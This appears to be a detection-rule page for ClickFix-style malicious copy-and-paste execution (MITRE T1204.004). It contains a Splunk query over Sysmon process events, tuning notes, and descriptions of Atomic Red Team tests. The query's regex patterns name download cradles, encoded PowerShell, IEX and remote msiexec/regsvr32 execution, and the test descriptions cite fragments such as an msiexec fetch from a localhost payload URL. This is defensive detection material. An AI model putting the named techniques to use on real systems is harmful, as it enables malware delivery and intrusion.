T1204.004 Splunk · SPL

Detect Malicious Copy and Paste in Splunk

Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.

MITRE ATT&CK

Tactic
Execution
Technique
T1204 User Execution
Sub-technique
T1204.004 Malicious Copy and Paste
Canonical reference
https://attack.mitre.org/techniques/T1204/004/

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
((ParentImage="*\\explorer.exe" AND (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe"))
OR ((ParentImage="*\\chrome.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\msedge.exe" OR ParentImage="*\\iexplore.exe" OR ParentImage="*\\brave.exe") AND (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe"))
OR ((Image="*\\mshta.exe" OR Image="*\\wscript.exe") AND (CommandLine="*javascript:*" OR CommandLine="*vbscript:*" OR CommandLine="*http://*" OR CommandLine="*https://*")))
| eval CommandLineLower=lower(CommandLine)
| eval RunDialogExecution=if(like(ParentImage, "%\\explorer.exe"), 1, 0)
| eval BrowserSpawn=if(match(ParentImage, "(chrome|firefox|msedge|iexplore|brave)\.exe$"), 1, 0)
| eval DownloadCradle=if(match(CommandLineLower, "(downloadstring|downloadfile|net\.webclient|invoke-webrequest|iwr\s|curl\s|wget\s|certutil.*urlcache|bitsadmin.*transfer)"), 1, 0)
| eval EncodedPayload=if(match(CommandLineLower, "(-encodedcommand|-enc\s|frombase64string)"), 1, 0)
| eval InlineScript=if(match(CommandLineLower, "(javascript:|vbscript:)"), 1, 0)
| eval InvokeExpression=if(match(CommandLineLower, "(invoke-expression|iex\(|iex\s)"), 1, 0)
| eval RemoteExec=if(match(CommandLineLower, "(msiexec.*(https?://)|regsvr32.*/i:https?://)"), 1, 0)
| eval ClickFixScore=RunDialogExecution + BrowserSpawn + DownloadCradle + EncodedPayload + InlineScript + InvokeExpression + RemoteExec
| where DownloadCradle=1 OR EncodedPayload=1 OR InlineScript=1 OR InvokeExpression=1 OR RemoteExec=1
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, ClickFixScore
| sort - ClickFixScore, - _time
high severity high confidence

Detects ClickFix-style malicious copy-and-paste execution using Sysmon Event ID 1 (Process Creation). Initial search filters on three parent-child relationship patterns: explorer.exe spawning scripting tools (Run Dialog), browser processes spawning interpreters, and mshta/wscript with inline or remote execution. Eval fields score each event across seven ClickFix indicators. The where clause requires at least one concrete malicious payload indicator beyond just the parent process, reducing false positives from legitimate explorer.exe-launched processes. Results sorted by score descending to surface highest-confidence events first.

Data Sources

Process: Process CreationCommand: Command ExecutionSysmon Event ID 1

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • IT administrators opening PowerShell from Run dialog with download-related parameters for legitimate patch management or configuration scripts
  • Software installers launched from Windows Explorer that chain to PowerShell or cmd with download steps during user-initiated setup
  • Browser-based terminal emulators or developer tools that spawn cmd.exe/PowerShell as a subprocess for legitimate integrated terminal functionality
  • Legitimate enterprise HTA applications using mshta.exe to fetch UI content from internal HTTP servers — tune by excluding known-internal IP ranges from the CommandLine match
Download portable Sigma rule (.yml)

Other platforms for T1204.004

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1ClickFix Run Dialog PowerShell Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.

  2. Test 2ClickFix mshta Inline JavaScript Execution

    Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.

  3. Test 3ClickFix Base64-Encoded PowerShell via Run Dialog

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.

  4. Test 4ClickFix msiexec Remote Package Execution

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.

Last updated: 2026-04-19 Research depth: deep
References (8)

Unlock Pro Content

Get the full detection package for T1204.004 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1204User Execution

Related Sub-techniques

T1204.001Malicious LinkT1204.002Malicious FileT1204.003Malicious ImageT1204.005Malicious Library

Related Techniques

T1204User ExecutionT1204.002Malicious FileT1189Drive-by CompromiseT1566.002Spearphishing LinkT1059.001PowerShellT1059.003Windows Command ShellT1218.005MshtaT1105Ingress Tool TransferT1552.001Credentials In FilesT1027Obfuscated Files or InformationT1218.010Regsvr32

Same Tactic: Execution

Popular Detections